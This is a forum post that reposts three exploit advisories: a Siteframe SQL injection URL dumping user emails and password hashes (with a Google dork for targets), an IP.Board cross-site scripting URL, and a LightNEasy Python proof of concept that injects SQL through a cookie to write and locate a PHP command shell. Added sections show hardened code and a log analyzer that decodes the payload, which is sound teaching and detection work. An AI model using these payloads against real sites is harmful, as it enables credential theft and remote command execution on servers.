#8
07.04.2012, 15:20
mr.Penguin
Learner
Registered: 08.03.2012
Posts: 40
Reputation: 74

AnGrY BoY/Siteframe 3.2.3 SQL Injection

Code:
# Exploit Title: Siteframe 'user.php' SQL Injection Vulnerability
# Google Dork: "powered by Siteframe"
# Date: 29/12/2010
# Author: AnGrY BoY
# Software Link: http://sitefrane.org/downloads/
# Version: Siteframe 3.2.3
# Tested on: Windows SP2
# CVE : N/A
 
# exploit:
 
# http://localhost/path/user.php?id=[SQL]
 
# http://localhost/path/user.php?id=-2+UNION+SELECT+1,2,3,4,5,concat(user_email,0x3e,user_passwd),7,8,9,10,11+from+users--
 
======================================================================================
# Special Thanks:- all h4kurd members
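Added example, not part of the advisory or of Siteframe's code: the defect behind a `user.php?id=[SQL]` finding is the request parameter being pasted into the SQL text, and the fix is type validation plus a bound parameter. The schema, column names (taken from the payload above) and rows are constructed; SQLite stands in for MySQL, so the payload is reduced to one column and uses `||` where the advisory uses `concat()`.

```python
import sqlite3


def build_db():
    """Constructed in-memory stand-in for the application's users table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (
            id INTEGER PRIMARY KEY,
            user_name TEXT,
            user_email TEXT,
            user_passwd TEXT
        );
        INSERT INTO users VALUES (1, 'alice', 'alice@example.test', 'hash-alice');
        INSERT INTO users VALUES (2, 'bob', 'bob@example.test', 'hash-bob');
    """)
    return conn


def lookup_user_vulnerable(conn, raw_id):
    """The pattern behind the advisory: the request parameter becomes part of the SQL text."""
    sql = "SELECT user_name FROM users WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def lookup_user_hardened(conn, raw_id):
    """Check the parameter's type first, then bind it; the value can no longer change the query."""
    try:
        user_id = int(raw_id)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer")
    sql = "SELECT user_name FROM users WHERE id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


# Same shape as the advisory's payload, rewritten for this one-column SQLite query.
# 0x3e in the original is the '>' separator.
PAYLOAD = "-2 UNION SELECT user_email || '>' || user_passwd FROM users--"


def demo():
    """Run both versions against a benign id and against the UNION payload."""
    conn = build_db()
    result = {
        "benign_vulnerable": lookup_user_vulnerable(conn, "1"),
        "benign_hardened": lookup_user_hardened(conn, "1"),
        # The vulnerable query returns rows from a different column set: the leak.
        "payload_vulnerable": sorted(lookup_user_vulnerable(conn, PAYLOAD)),
    }
    try:
        lookup_user_hardened(conn, PAYLOAD)
        result["payload_hardened"] = "query ran"
    except ValueError as exc:
        result["payload_hardened"] = "rejected: " + str(exc)
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The integer check is what stops the request before it reaches the database; the bound parameter is the second layer, so that a future string-typed parameter cannot reintroduce the problem.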

Vasil A./Invision Power Board 3.2.3 Cross Site Scripting

Code:
Name :  Cross-site scripting vulnerability in Invision Power Board version 3.2.3
Software :  Invision Power Board version 3.2.3
Vendor Homepage :  http://www.invisionpower.com
Vulnerability Type :  Cross-site scripting
Researcher :  Vasil A. xss@9y.com
 
Description
--------------------
Invision Power Board (abbreviated IPB, IP.Board or IP Board) is an
Internet forum software produced by Invision Power Services, Inc. It
is written in PHP and primarily uses MySQL as a database management
system, although support for other database engines is available.
 
Details
--------------------
IP Board is affected by a Cross-site scripting vulnerability in version 3.2.3.
 
Example PoC URL is as follows:
 
http://example.com/forums/index.php?showforum=53">with(document)alert(cookie)
 
Additional notes:
1. If a forum contains sub-forums, this vulnerability does not exist.
 
2. Most boards use the "Friendly URL style", but the attack can be
performed by using the "legacy URL style" in the query, e.g.:
 
http://example.com/forum/index.php?showforum=2">alert(/xss/.source)
 
instead of:
 
http://example.com/forum/index.php?/forum/2-example/
 
Solution
--------------------
The vendor issued a patch for this vulnerability. Please see the references.
 
Advisory Timeline
--------------------
10/03/2012 - First contact: Sent the vulnerability details
12/03/2012 - Second contact: Asked for patch
14/03/2012 - Vulnerability Fixed
15/03/2012 - Vulnerability Released
 
Credits
-------------------
It was discovered during testing of Netsparker, Web Application
Security Scanner - http://www.mavitunasecurity.com/netsparker/.
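Added example, not part of the advisory or of IP.Board's code: the `showforum` value in the PoC URL ends the attribute it is reflected into with `">`. The markup templates below are constructed; the point is that an identifier parameter is validated by type before it is echoed, and any value that does reach the page is encoded for its HTML context.

```python
import html

# Constructed from the advisory's PoC URL: the value of the showforum parameter.
PAYLOAD = '53">with(document)alert(cookie)'

LINK_TEMPLATE = '<a href="index.php?showforum=%s">Forum %s</a>'
SEARCH_TEMPLATE = '<input type="text" name="q" value="%s">'


def forum_link_vulnerable(showforum):
    """Reflects the raw parameter: a value containing '">' closes the attribute and the tag."""
    return LINK_TEMPLATE % (showforum, showforum)


def attribute_escape(value):
    """Encode text for a double-quoted HTML attribute (quote=True also encodes " and ')."""
    return html.escape(str(value), quote=True)


def forum_link_hardened(showforum):
    """An identifier is validated by type; the rejected value is never echoed back."""
    try:
        forum_id = int(showforum)
    except (TypeError, ValueError):
        return None  # caller answers 400 instead of rendering
    safe = attribute_escape(forum_id)  # encoding is kept as the second layer
    return LINK_TEMPLATE % (safe, safe)


def search_form(query):
    """Free-text parameters cannot be type-checked away; encoding is the defence."""
    return SEARCH_TEMPLATE % attribute_escape(query)


def attribute_breakouts(markup):
    """Crude check for review: how many times does '">' occur in the rendered fragment?
    One is the template's own; any more means a value closed an attribute early."""
    return markup.count('">')


if __name__ == "__main__":
    print(forum_link_vulnerable(PAYLOAD))
    print(forum_link_hardened(PAYLOAD))
    print(search_form(PAYLOAD))
```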

AutoSec Tools/LightNEasy 3.2.3 SQL Injection

Code:
# ------------------------------------------------------------------------
# Software................LightNEasy 3.2.3
# Vulnerability...........SQL Injection
# Threat Level............Critical (4/5)
# Download................http://www.lightneasy.org/
# Discovery Date..........4/21/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch 
# ------------------------------------------------------------------------
# 
# 
# --Description--
# 
# A SQL injection vulnerability in LightNEasy 3.2.3 can be exploited to
# extract arbitrary data. In some environments it may be possible to
# create a PHP shell.
# 
# 
# --PoC--
 
import socket
 
host = 'localhost'
path = '/lne323'
shell_path = '/shell.php'
port = 80
 
def upload_shell():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)    
 
    s.send('POST ' + path + '/index.php?do=&page= HTTP/1.1\r\n'
           'Host: localhost\r\n'
           'Proxy-Connection: keep-alive\r\n'
           'User-Agent: x\r\n'
           'Content-Length: 73\r\n'
           'Cache-Control: max-age=0\r\n'
           'Origin: null\r\n'
           'Content-Type: multipart/form-data; boundary=----x\r\n'
           'Cookie: userhandle=%22UNION/**/SELECT/**/CONCAT(char(60),char(63),char(112),char(104),char(112),char(32),char(115),char(121),char(115),char(116),char(101),char(109),char(40),char(36),char(95),char(71),char(69),char(84),char(91),char(39),char(67),char(77),char(68),char(39),char(93),char(41),char(59),char(32),char(63),char(62)),%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22/**/FROM/**/dual/**/INTO/**/OUTFILE%22../../htdocs/shell.php%22%23\r\n'
           'Accept: text/html\r\n'
           'Accept-Language: en-US,en;q=0.8\r\n'
           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
           '\r\n'
           '------x\r\n'
           'Content-Disposition: form-data; name="submit"\r\n'
           '\r\n'
           '\r\n'
           '------x--\r\n'
           '\r\n')
 
    resp = s.recv(8192)
 
    http_ok = 'HTTP/1.1 200 OK'
 
    if http_ok not in resp[:len(http_ok)]:
        print 'error uploading shell'
        return
    else: print 'shell uploaded'
 
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)     
 
    s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
           'Host: ' + host + '\r\n\r\n')
 
    if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found'        
    else: print 'shell located at http://' + host + shell_path
 
upload_shell()
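Added example, not part of the advisory or of LightNEasy's code: the PoC carries its injection in the `userhandle` cookie, hides spaces as `/**/`, builds the file contents from `char()` calls and uses `INTO OUTFILE` to write outside the database. The function below takes a captured `Cookie` header (the one from the PoC above, embedded as a constructed sample), undoes both evasions and reports what the payload would do, which is what an analyst wants from a request log or a WAF alert. The keyword list and the flagging rule are assumptions of this example.

```python
import re
from urllib.parse import unquote

# Constructed sample: the Cookie header value from the PoC request above.
SAMPLE_COOKIE = (
    "userhandle=%22UNION/**/SELECT/**/CONCAT(char(60),char(63),char(112),char(104),"
    "char(112),char(32),char(115),char(121),char(115),char(116),char(101),char(109),"
    "char(40),char(36),char(95),char(71),char(69),char(84),char(91),char(39),char(67),"
    "char(77),char(68),char(39),char(93),char(41),char(59),char(32),char(63),char(62)),"
    "%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22"
    "/**/FROM/**/dual/**/INTO/**/OUTFILE%22../../htdocs/shell.php%22%23"
)

# SQL fragments that should never appear inside a session or user cookie.
KEYWORD_RE = re.compile(r"\b(UNION|SELECT|INTO\s+(?:OUT|DUMP)FILE|LOAD_FILE)\b", re.IGNORECASE)
# char(60) or char(60,63,...) calls, optionally chained with commas inside CONCAT().
CHAR_CALL = r"char\(\s*\d+(?:\s*,\s*\d+)*\s*\)"
CHAR_SEQ = re.compile(CHAR_CALL + r"(?:\s*,\s*" + CHAR_CALL + r")*", re.IGNORECASE)
OUTFILE_RE = re.compile(r"INTO\s+(?:OUT|DUMP)FILE\s*['\"]([^'\"]+)['\"]", re.IGNORECASE)


def normalize(value):
    """Undo the two evasions in the PoC: URL encoding and /**/ standing in for spaces."""
    text = unquote(value).replace("/**/", " ")
    return re.sub(r"\s+", " ", text)


def decode_char_sequences(sql):
    """Turn each run of char(N) calls into the string it would build at runtime."""
    decoded = []
    for m in CHAR_SEQ.finditer(sql):
        codes = [int(n) for n in re.findall(r"\d+", m.group(0))]
        decoded.append("".join(chr(c) for c in codes if 0 <= c < 0x110000))
    return decoded


def analyze_cookie(header_value):
    """Scan each name=value pair of a Cookie header; return one finding per suspicious cookie."""
    findings = []
    for pair in header_value.split(";"):
        if "=" not in pair:
            continue
        name, raw = pair.strip().split("=", 1)
        sql = normalize(raw)
        hits = []
        for m in KEYWORD_RE.finditer(sql):
            kw = re.sub(r"\s+", " ", m.group(1).upper())
            if kw not in hits:
                hits.append(kw)
        # Flag a UNION SELECT pair, or any file read/write keyword on its own;
        # a lone SELECT or UNION in a cookie is left to the reviewer.
        file_io = any(h not in ("UNION", "SELECT") for h in hits)
        if not ({"UNION", "SELECT"} <= set(hits) or file_io):
            continue
        m = OUTFILE_RE.search(sql)
        findings.append({
            "name": name,
            "keywords": hits,
            "comment_obfuscation": "/**/" in raw,
            "outfile": m.group(1) if m else None,
            "decoded_strings": decode_char_sequences(sql),
        })
    return findings


if __name__ == "__main__":
    for finding in analyze_cookie(SAMPLE_COOKIE):
        print(finding)
```

The `outfile` path in the finding is the thing to act on first: `INTO OUTFILE` only works when the database account holds the FILE privilege and the server process can write to that directory, so a hit here is both an indicator and a pointer to two permissions worth tightening.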
 